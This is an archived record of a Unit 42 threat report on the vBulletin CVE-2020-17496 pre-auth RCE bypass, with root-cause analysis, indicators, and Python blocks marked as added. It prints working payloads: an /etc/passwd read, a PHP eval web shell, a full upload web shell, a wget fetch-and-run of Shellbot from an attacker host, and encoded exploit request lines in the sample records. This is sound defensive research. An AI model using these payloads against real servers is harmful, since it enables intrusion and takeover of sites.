{
	"id": "d1b13c08-0e5f-44d5-a709-aafc13f2dc21",
	"created_at": "2026-04-06T00:14:02.448002Z",
	"updated_at": "2026-04-10T13:12:02.708137Z",
	"deleted_at": null,
	"sha1_hash": "4e74e65d19e675497fb8b4e587b787f9abdbf362",
	"title": "Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2654343,
	"plain_text": "Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability\r\nCVE-2020-17496\r\nBy Haozhe Zhang, Qi Deng, Zhibin Zhang, Ruchna Nigam\r\nPublished: 2020-09-03 · Archived: 2026-04-05 21:40:31 UTC\r\n \r\nExecutive Summary\r\nIn September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for\r\nvBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin\r\nvulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an\r\nattacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to\r\n5.5.4, and potentially lock organizations out from their own sites.\r\nRecently, Unit 42 researchers found exploits in the wild leveraging the vBulletin pre-auth RCE vulnerability CVE-2020-17496. The exploits are a bypass of the fix for the previous vulnerability, CVE-2019-16759, which allows\r\nattackers to send a crafted HTTP request with a specified template name and malicious PHP code, and leads to\r\nremote code execution. More than 100,000 sites are built on vBulletin, including the forums of major enterprises\r\nand organizations, so it’s imperative to patch immediately.\r\nIn this blog, we provide details on the bypass of the patch of the vulnerability, proof of concept code (PoC) to\r\ndemonstrate the vulnerability and information on attacks we have observed in the wild.\r\nPalo Alto Networks customers are protected by the following services and products via Threat Prevention\r\nsignatures and URL Filtering blocks the related C2 traffic.\r\nRoot Cause Analysis of the Vulnerability (CVE-2020-17496)\r\nTemplate rendering is a functionality of vBulletin that can convert XML templates to PHP code and execute it.\r\nBeginning from version 5.0, vBulletin starts to accept Ajax requests for template rendering. The rendering is\r\nexecuted with a function staticRenderAjax. 
As shown in Figure 1, the values of the parameters for this function come from $_REQUEST, $_GET and $_POST. The template name and the associated widget config taken from those parameters are therefore user-controllable, which is the root of the RCE vulnerability CVE-2019-16759.\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 1 of 17\r\n\r\nFigure 1. The callRender() in vBulletin \u003c 5.5.5\r\nWhen an attacker sends an Ajax request that names the template widget_php and places malicious code in the parameter widgetConfig['code'], the render engine converts the XML template widget_php shown in Figure 2 into a string of PHP code and then executes that string with eval, highlighted in Figure 3. Because the generated code contains the line vB5_Template_Runtime::evalPhp('' . $widgetConfig['code'] . ''), the code supplied in the request is executed.\r\nFigure 2. Template \"widget_php\"\r\nThe PHP code rendered from widget_php is reproduced below; the HTML fragments between the concatenated string pieces were dropped by the PDF extraction and appear as empty strings:\r\n$final_rendered = '' . '';\r\nif (empty($widgetConfig) AND !empty($widgetinstanceid))\r\n{\r\n$final_rendered .= ' ' . '';\r\n$widgetConfig = vB5_Template_Runtime::parseData('widget', 'fetchConfig', $widgetinstanceid);\r\n$final_rendered .= '' . ' ';\r\n}\r\nelse {\r\n$final_rendered .= '';\r\n}\r\n$final_rendered .= '' . ' ' . '';\r\nif (!empty($widgetConfig))\r\n{\r\n$final_rendered .= ' ' . '';\r\n$widgetid = $widgetConfig['widgetid'];\r\n$final_rendered .= '' . ' ' . '';\r\n$widgetinstanceid = $widgetConfig['widgetinstanceid'];\r\n$final_rendered .= '' . ' ';\r\n}\r\nelse\r\n{\r\n$final_rendered .= '';\r\n}\r\n$final_rendered .= '' . ' ' . 
vB5_Template_Runtime::includeTemplate('module_title',array('widgetConfig' =\u003e $widgetConfig, 'show_title_divider' =\u003e '1', 'can_use_sitebuilder' =\u003e $user['can_use_sitebuilder'])) . ' ' . '';\r\nif (!empty($widgetConfig['code']) AND !vB::getDatastore()-\u003egetOption('disable_php_rendering'))\r\n{\r\n$final_rendered .= ' ' . '' . ' ' . vB5_Template_Runtime::evalPhp('' . $widgetConfig['code'] . '') . ' ';\r\n}\r\nelse\r\n{\r\n$final_rendered .= ' ' . '';\r\nif ($user['can_use_sitebuilder'])\r\n{\r\n$final_rendered .= ' ' . vB5_Template_Runtime::parsePhrase(\"click_edit_to_config_module\") . ' ';\r\n}\r\nelse\r\n{\r\n$final_rendered .= '';\r\n}\r\n$final_rendered .= '' . ' ';\r\n}\r\n$final_rendered .= '' . ' ';\r\nFigure 3. Eval the PHP code rendered from the XML template\r\nBeginning with version 5.5.5, a fix for CVE-2019-16759 was introduced into the function callRender(), as shown in Figure 4. It uses a disallow-list to check the requested template name: if the name is widget_php, the engine refuses to render the requested template.\r\nFigure 4. The callRender() in vBulletin ≥ 5.5.5\r\nA second fix makes the evalPhp function check the current template name. After the fix, widget_php is the only template from which PHP code can be executed, as shown in Figure 5.\r\nFigure 5. 
evalPhp() executes code only when the template is widget_php\r\nTogether, the two fixes make widget_php the only template that can execute PHP code and, at the same time, block direct user requests for that template. In the latest bypass, however, we found that another template can be used to load widget_php: widget_tabbedcontainer_tab_panel.\r\nFigure 6. The template widget_tabbedcontainer_tab_panel\r\nThe template widget_tabbedcontainer_tab_panel, shown in Figure 6, renders multiple child templates. Rendering the template itself does not directly lead to remote code execution, but rendering it triggers the rendering of its child templates.\r\nThe PHP code rendered from the widget_tabbedcontainer_tab_panel XML template is reproduced below (HTML fragments again appear as empty strings). Once generated, this code is executed.\r\n$final_rendered = '' . '';\r\n$panel_id = '' . vB5_Template_Runtime::vBVar($id_prefix).vB5_Template_Runtime::vBVar($tab_num) . '';\r\n$final_rendered .= '' . '' . '' . ' ' . '';\r\nif (isset($subWidgets) AND (is_array($subWidgets) OR $subWidgets instanceof ArrayAccess))\r\n{\r\nforeach ($subWidgets AS $subWidget)\r\n{\r\n$final_rendered .= ' ' . vB5_Template_Runtime::includeTemplate($subWidget['template'],array('widgetConfig' =\u003e $subWidget['config'], 'widgetinstanceid' =\u003e $subWidget['widgetinstanceid'], 'widgettitle' =\u003e $subWidget['title'], 'tabbedContainerSubModules' =\u003e $subWidget['tabbedContainerSubModules'], 'product' =\u003e $subWidget['product'])) . ' ';\r\n}\r\n}\r\n$final_rendered .= '' . 
'';\r\nThe rendered PHP shows that the engine iterates over $subWidgets and, for each element, creates a new template object named by $subWidget['template'] with $subWidget['config'] passed in as widgetConfig, then renders it and runs the resulting PHP. If $subWidget['template'] is the string widget_php and the malicious code is placed in $subWidget['config']['code'], which becomes $widgetConfig['code'] inside the child template, the code is executed just as with CVE-2019-16759: the disallow-list in callRender() only inspects the top-level template name, and the evalPhp() check passes because the template being rendered at that point is widget_php.\r\nProof of Concept\r\nBased on this analysis, we can construct exploit code to demonstrate the vulnerability. callRender() is only reachable through the HTTP POST method (Figure 7).\r\nFigure 7. Call of the callRender()\r\nFigure 8 shows a compromised page containing the output of phpinfo(); together with the request that produced it. Figures 9 and 10 show other crafted requests with the same effect.\r\nIn the request URL, the child template name widget_php and the malicious code phpinfo();exit(); are carried in the first element of the subWidgets array. When the backend processes this request, the malicious code is executed.\r\nFigure 8. Reproduction of the exploit – 1\r\nFigure 9. Reproduction of the exploit – 2\r\nFigure 10. Reproduction of the exploit – 3\r\nExploits in the Wild: CVE-2020-17496\r\nWe caught the first exploitation of CVE-2020-17496 on Aug. 10, 2020, and have since seen ongoing exploitation attempts from different IP addresses. Note that these are disparate attacks, not a coordinated effort by any particular attacker.\r\nScanning Activities\r\nIn the malicious traffic we captured, multiple source IPs are running scans. These scans try to find vulnerable sites and record them, an early step of an attack. The traffic is shown in Figures 11-14. 
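The bypass mechanism described in the root cause analysis above, as an added example that is not code from the original page or from vBulletin: a small Python model of the 5.5.5 render path (the callRender() disallow-list, includeTemplate() and the evalPhp() template check) that shows a direct widget_php request being blocked, the same code reaching evalPhp() through a widget_tabbedcontainer_tab_panel child template, and one illustrative hardening. The template bodies, the hardened variant (an assumption, not the vendor's actual patch) and the demo payload are all constructed for the example.

```python
# Added example, not vBulletin code: a minimal Python model of the vBulletin
# 5.5.5 render path described above. It shows why the disallow-list that
# callRender() applies to the requested template name is bypassed through
# widget_tabbedcontainer_tab_panel, and one illustrative hardening.
# Template bodies and the hardened variant are assumptions for illustration,
# not the vendor's actual code or patch.

DISALLOWED = {'widget_php'}   # the 5.5.5 disallow-list checked by callRender()


class CodeExecuted(Exception):
    '''Raised instead of running PHP: carries the code evalPhp() would eval.'''


def eval_php(current_template, code):
    # Post-5.5.5 check: evalPhp() honours code only when the *current*
    # template is widget_php. Exactly the property the bypass relies on.
    if current_template != 'widget_php':
        return ''
    raise CodeExecuted(code)


def include_template(name, vars_, hardened=False):
    # Illustrative hardening (assumption, not the vendor patch): apply the
    # disallow-list to every template included during the request, not only
    # to the top-level name that callRender() checks.
    if hardened and name in DISALLOWED:
        return ''
    return render(name, vars_, hardened)


def render(name, vars_, hardened=False):
    # Toy templates modelled on the rendered PHP listings above.
    if name == 'widget_php':
        cfg = vars_.get('widgetConfig') or {}
        if cfg.get('code'):
            return eval_php('widget_php', cfg['code'])
        return ''
    if name == 'widget_tabbedcontainer_tab_panel':
        out = ''
        for sub in vars_.get('subWidgets') or []:
            child_vars = {'widgetConfig': sub.get('config') or {}}
            out += include_template(sub['template'], child_vars, hardened)
        return out
    return ''   # any other template renders nothing in this model


def call_render(template_name, params, hardened=False):
    '''Model of callRender(): the Ajax entry point; params come from the request.'''
    if template_name in DISALLOWED:
        return 'blocked'
    try:
        render(template_name, params, hardened)
    except CodeExecuted as exc:
        return 'executed:' + exc.args[0]
    return 'rendered'


def demo():
    '''Direct widget_php request, the tab-panel bypass, and the hardened engine.'''
    payload = 'phpinfo();exit();'
    bypass_params = {'subWidgets': [{'template': 'widget_php',
                                     'config': {'code': payload}}]}
    direct = call_render('widget_php', {'widgetConfig': {'code': payload}})
    bypass = call_render('widget_tabbedcontainer_tab_panel', bypass_params)
    fixed = call_render('widget_tabbedcontainer_tab_panel', bypass_params, hardened=True)
    return direct, bypass, fixed


if __name__ == '__main__':
    print(demo())
```

Run with python3; demo() returns ('blocked', 'executed:phpinfo();exit();', 'rendered'): the disallow-list stops the top-level name, the child inclusion reaches evalPhp() with widget_php as the current template, and applying the same disallow-list inside includeTemplate() closes that path in the model. The general lesson is that an entry-point name check is not a security boundary when the checked component can include other components whose names also come from the request.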
These payloads execute the system commands echo and id; from the response, the attacker learns whether the target is vulnerable.\r\nFigure 11. Exploit in the wild – 1\r\nFigure 12. Exploit in the wild – 2\r\nFigure 13. Exploit in the wild – 3\r\nFigure 14. Exploit in the wild – 4\r\nSensitive File Reading\r\nSome attackers exploit the vulnerability to read files on the server. The payload calls the PHP function shell_exec() to run arbitrary system commands, here cat ../../../../../../../../../../etc/passwd to read the contents of /etc/passwd. The traffic is shown in Figure 15. Once the attack succeeds, sensitive information from the target may be disclosed.\r\nFigure 15. Exploit in the wild – 5\r\nWriting Web Shell\r\nSome attackers exploit the vulnerability to install a web shell.\r\nFigure 16 shows an exploit that writes the PHP web shell \u003c?php @eval($_POST[\"x\"]);?\u003e to the file conf.php under the web root using the PHP function file_put_contents(). Once the attack succeeds, the attacker can send commands in the parameter x of an HTTP POST request to the web shell and have them executed on the server.\r\nFigure 16. Exploit in the wild – 6\r\nFigure 17 shows an exploit that downloads a PHP script onto the victim server. The web shell code is shown below. 
The code presents an upload page through which the attacker can upload arbitrary files and carry out the follow-up steps of the attack.\r\n\u003c?php\r\n// The HTML upload form emitted between the echo statements was dropped by the PDF extraction.\r\nerror_reporting(0);\r\necho \"Jasmine \\n\";\r\necho \"\".php_uname().\"\";\r\nprint \"\\n\";\r\n$disable_functions = @ini_get(\"disable_functions\");\r\necho \" \\nDisablePHP=\".$disable_functions;\r\nprint \"\\n\";\r\necho \"\";\r\necho \" \\n\";\r\nif($_POST[\"k\"]==upload){\r\nif(@copy($_FILES[\"f\"][\"tmp_name\"],$_FILES[\"f\"][\"name\"])){\r\necho \"\u003cb\u003e\".$_FILES[\"f\"][\"name\"];\r\n}else{\r\necho \"\u003cb\u003eGagal upload cok\"; // Indonesian: upload failed\r\n}\r\n}\r\n?\u003e\r\nFigure 17. Exploit in the wild – 7\r\nFigure 18 shows an exploit that writes base64-encoded PHP code into a file under the web root. The resulting page is an arbitrary file upload entry point, again allowing the attacker to carry out the follow-up steps of the attack.\r\nFigure 18. Exploit in the wild – 8\r\nDownloading Shellbot\r\nSome attackers use the vulnerability to download a Perl-based bot (Shellbot): the payload calls the PHP function shell_exec() to run wget against http://178[.]170[.]117[.]50/bot1 and then executes the script. The payload can be seen in Figure 19.\r\nFigure 19. Exploit in the wild – 9\r\nOnce executed, the script connects to an IRC-based command-and-control (C2) server at 66[.]7[.]149[.]161:6667, joins the IRC channel #afk and keeps answering the server's PING messages, as in the traffic shown in Figure 20. 
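The in-the-wild payload categories above (recon with echo and id, reading /etc/passwd, dropping a web shell, downloading Shellbot), as an added detection example that is not code from the original page or from Unit 42: it parses constructed request records, flags render requests whose subWidgets[N][template] is widget_php (and the older direct widget_php shape of CVE-2019-16759), pulls the PHP out of subWidgets[N][config][code] and labels its intent. The record layout, the /ajax/render/<template> path (which the text above does not state) and every sample line are constructed assumptions; 198.51.100.7 is a TEST-NET placeholder standing in for the bot host.

```python
# Added example, not code from the original page or from Unit 42: classify
# CVE-2020-17496 (and the older CVE-2019-16759 shape) exploitation attempts in
# request records, using the indicators the text describes: a render request
# for widget_tabbedcontainer_tab_panel whose subWidgets[N][template] is
# widget_php and whose subWidgets[N][config][code] carries PHP. The record
# layout, the /ajax/render/<template> path and all sample lines are
# constructed assumptions for this example.
import re
from urllib.parse import parse_qs, urlsplit

# Constructed records: '<src_ip> <method> <request-target>'. Payloads mirror
# the in-the-wild categories described on the page (recon, /etc/passwd read,
# web shell drop, bot download); 198.51.100.7 is a TEST-NET placeholder.
SAMPLE_RECORDS = '''
203.0.113.10 POST /ajax/render/widget_tabbedcontainer_tab_panel?subWidgets%5B0%5D%5Btemplate%5D=widget_php&subWidgets%5B0%5D%5Bconfig%5D%5Bcode%5D=echo+shell_exec%28%27id%27%29%3Bexit%3B
203.0.113.11 POST /ajax/render/widget_tabbedcontainer_tab_panel?subWidgets%5B0%5D%5Btemplate%5D=widget_php&subWidgets%5B0%5D%5Bconfig%5D%5Bcode%5D=echo+shell_exec%28%27cat+../../../../../../../../../../etc/passwd%27%29%3B
203.0.113.12 POST /ajax/render/widget_tabbedcontainer_tab_panel?subWidgets%5B0%5D%5Btemplate%5D=widget_php&subWidgets%5B0%5D%5Bconfig%5D%5Bcode%5D=file_put_contents%28%27conf.php%27%2C%27%3C%3Fphp+%40eval%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B
203.0.113.13 POST /ajax/render/widget_tabbedcontainer_tab_panel?subWidgets%5B0%5D%5Btemplate%5D=widget_php&subWidgets%5B0%5D%5Bconfig%5D%5Bcode%5D=shell_exec%28%27wget+http%3A%2F%2F198.51.100.7%2Fbot1+-O+%2Ftmp%2Fbot1%3B+perl+%2Ftmp%2Fbot1%27%29%3B
203.0.113.14 POST /ajax/render/widget_php?widgetConfig%5Bcode%5D=phpinfo%28%29%3B
203.0.113.15 GET /forum/threads?page=2
'''

# Standalone recon tokens; the character classes avoid matching inside longer names.
RECON = re.compile('(^|[^A-Za-z_])(id|whoami|phpinfo|echo)([^A-Za-z_]|$)')


def classify_code(code):
    '''Coarse intent label for a PHP payload, ordered from most to least specific.'''
    if 'file_put_contents' in code or 'eval($_POST' in code:
        return 'webshell-write'
    if 'etc/passwd' in code:
        return 'file-read'
    if 'wget ' in code or 'curl ' in code:
        return 'download-execute'
    if RECON.search(code):
        return 'recon'
    return 'unknown-code'


def analyse_record(line):
    '''Return (src_ip, cve, intent, code) for an exploit attempt, else None.'''
    src_ip, _method, target = line.split(' ', 2)
    parts = urlsplit(target)
    template = parts.path.rstrip('/').rsplit('/', 1)[-1]
    params = parse_qs(parts.query)   # decodes %5B/%5D to [ and ] in the keys
    if template == 'widget_php' and 'widgetConfig[code]' in params:
        code = params['widgetConfig[code]'][0]
        return (src_ip, 'CVE-2019-16759', classify_code(code), code)
    if template != 'widget_tabbedcontainer_tab_panel':
        return None
    for key, values in params.items():
        if key.startswith('subWidgets[') and key.endswith('][template]') and 'widget_php' in values:
            idx = key[len('subWidgets['):-len('][template]')]
            code = params.get('subWidgets[' + idx + '][config][code]', [''])[0]
            return (src_ip, 'CVE-2020-17496', classify_code(code), code)
    return None


def scan(records):
    '''Return one finding per exploit attempt in the given record text.'''
    return [hit for hit in (analyse_record(l) for l in records.strip().splitlines()) if hit]


if __name__ == '__main__':
    for src_ip, cve, intent, code in scan(SAMPLE_RECORDS):
        print(src_ip, cve, intent, code[:60])
```

The page notes that callRender() needs POST, yet the PoC and the in-the-wild requests carry their parameters in the URL, so query strings in ordinary access logs are enough for this pass. A payload sent only in the POST body needs a WAF or IDS capture of the body; the same analyse_record() logic applies once the body parameters are decoded the same way.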
Once it receives commands from the channel, it runs the corresponding routines: port scanning, file download, execution of system commands, flood attacks, spawning a shell for the attackers, and so on.\r\nFigure 20. Traffic during the execution of the ShellBot script\r\nDownloading Sora\r\nOne exploit was found to download a Mirai variant (Sora) from the attacker's server. However, the payload is ineffective, as it uses the wrong HTTP method.\r\nFigure 21. Exploit in the wild – 10\r\nAnalysis of the samples shows that they spread using different combinations of exploits for CVE-2020-5902 (which would be ineffective, as the payload uses bash commands whereas the exploit requires the injected commands to be specific CLI-compatible ones), CVE-2020-1937, CVE-2020-10173, CVE-2020-10987, Netgear R700 RCE, Netlink GPON Router 1.0.11 RCE and the vulnerability CVE-2020-17496 discussed in this blog.\r\nConclusion\r\nOur threat platform detects multiple kinds of exploit attempts against the vBulletin pre-auth RCE vulnerability CVE-2020-17496. As a widely used forum package that has been on the market for a long time, vBulletin is a prized target for attackers.\r\nvBulletin released the patch for this vulnerability on Aug. 10, 2020. 
Applying the patch, or upgrading to the latest version, mitigates the risk and is strongly advised.\r\nPalo Alto Networks customers are protected by the following services and products:\r\nThreat Prevention signatures 59133 and 80671.\r\nURL Filtering blocks the related C2 traffic of the Shellbot.\r\nIndicators of Compromise\r\nShellbot Hash (SHA256)\r\n88DDD8A1B77477AAFFD1BB163B9770D72A77BF29BFCA226E79C28D15BEF983ED\r\nMirai Variant (Sora) Hashes (SHA256)\r\n03bfec4e039805091fe30fa978d5ec7f28431bb0fca4b137e075257b3e1c0dd4\r\nb4cb04709f613b5363514e75984084ef1d3eaba7c50638b2a5a284680831b992\r\n94f02ea10b4546da71bd46916f0fe260b40c8ed4deccf0588687e62ca3819ad7\r\nbd72be4f7d64795b902f352e47b1654eaee6b5a71cddfaf2c245dba1b2d602eb\r\n77b4f7f0d66a0333d756116eaae567a8540392f558c49d507bf6da10bd047fe3\r\n051baaabf205c7c0f5fd455ac5775447f9f3df0cc9bc5f66f6d386f368520581\r\nfd63b9c7e9dce51348d9600f67139ea8959fdbbca84d505b5e9317bbdca74016\r\n8b5810e07cf21ebb1c2ff23c13ce88022c1dd5bc2df32f4d7e5480b4ddb82de2\r\nded23c3f5f2950257d8cfb215c40d5f54b28fde23c02f61ce1eb746843f43397\r\n80fb66c6b1191954c31734355a236b7342dc3fd074ead47f9c1ed465561c6e8c\r\nf30bb52c0e32dfe524fc0dfda1724a1ffb88647c39c33a66dfd66109fecceec7\r\n1900e09983acf7ddc658b860be7875a527bc914cbffcf0aaff0b4182ecef047b\r\nfa7575bd0cd2a83995ea34d8d008eb07c2062a843e5e155e2e0d8b35a0cf7901\r\n68132010d9a543a6a2a9ea61e771cf2c041cea259cc76affdfe663e20c130a45\r\nab671fc0c68ed1c249c2bb52b28ae3d70df8bd1614d86f6d6a3f4c21d7841d72\r\n4ff21e69b11566336f4fd56ac2829cdcf215182e8ff807f8e744c0a2b08f726f\r\na7373fa18b367edbcd4462345a5da087821e34734bdf05d1c4060a7694868c5e\r\ndec56b06e03665d2c656b530d3b6f90ca0ec2925bec4559d8a2cec5da3a7700b\r\nc379139347470254f19041f05e19f5454750e052f04f6d377ec8df19ce959519\r\nfed0f0d3e9d990f8a83b86d29e586d46e7cac54efb0eae2f07112d61afb9b885\r\n84448ee487010d6fed918febe230b71a8ec1266e300f85933014db2566645857\r\n994889422b24a5b4759eda30265f1b933a458e15927b4f7949d4a3ba79eb43ca\r\n39b6d72101adae2b71815328599f8e67ee27955849dfb3825c5b2731d504696b\r\n0747988a77c89c1267a882b663fbd4168e25aed239fb1553e65bb4ac74ecda67\r\n99d06d1c82af244b1533c1173ca10da7f29bfbf753073f20f5dc7a0016152a4c\r\n372ab5c1c23d198b594353239a96d6cf620cc56588f5fdf5dfb32919dd019020\r\nef2a6b37568e14dacd5d8894ce2e4bbc593ffd58e197827a052d2c2f0a756949\r\n1cf9ac9150d59de25ca5ac1f855fadf1b03f13b4e9ced63a12acef9c8292a648\r\ncf172b4629e321e4c78a1d0717130bbb693392712a86d3d85d035bae1f377dbd\r\n1a0293d4863ccef36e138e4f6c65ad013a403db0ffc69ebaf04b43b61b4ba798\r\n2a14b9b01ec78a332be40339a782a2cf2bf9a237eee9cc5fcd40fa3385b1d4fb\r\nf56150ff764328ee59eeaafe5e2d63574b475a69386c9ac4978006070807edc9\r\n9572a532c08f81d7957ffd4639f95c34a2085f119fa426d8ea911af72bfd0b4a\r\n113ad91a1aab3abcd704fe8670fbc043f049586462a4c58dabdd44c14519ea66\r\nf9d7d9b11c60bd52625e7d9a33516c2bac96ac542a22696d0da3a9c536dae11b\r\n6f01ef6670ecd79f9b322dd8521bc13a73037e7f84fa9aad35d11d964d8f9e60\r\n2960748648bc2cd1b3db5e1e1ce9931a6588d65ae91c6d09e6b8bf2d78b00263\r\nIP Addresses\r\n66[.]7[.]149[.]161\r\n178[.]170[.]117[.]50\r\nSource: https://unit42.paloaltonetworks.com/cve-2020-17496/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2020-17496/"
	],
	"report_names": [
		"cve-2020-17496"
	],
	"threat_actors": [],
	"ts_created_at": 1775434442,
	"ts_updated_at": 1775826722,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e74e65d19e675497fb8b4e587b787f9abdbf362.pdf",
		"text": "https://archive.orkl.eu/4e74e65d19e675497fb8b4e587b787f9abdbf362.txt",
		"img": "https://archive.orkl.eu/4e74e65d19e675497fb8b4e587b787f9abdbf362.jpg"
	}
}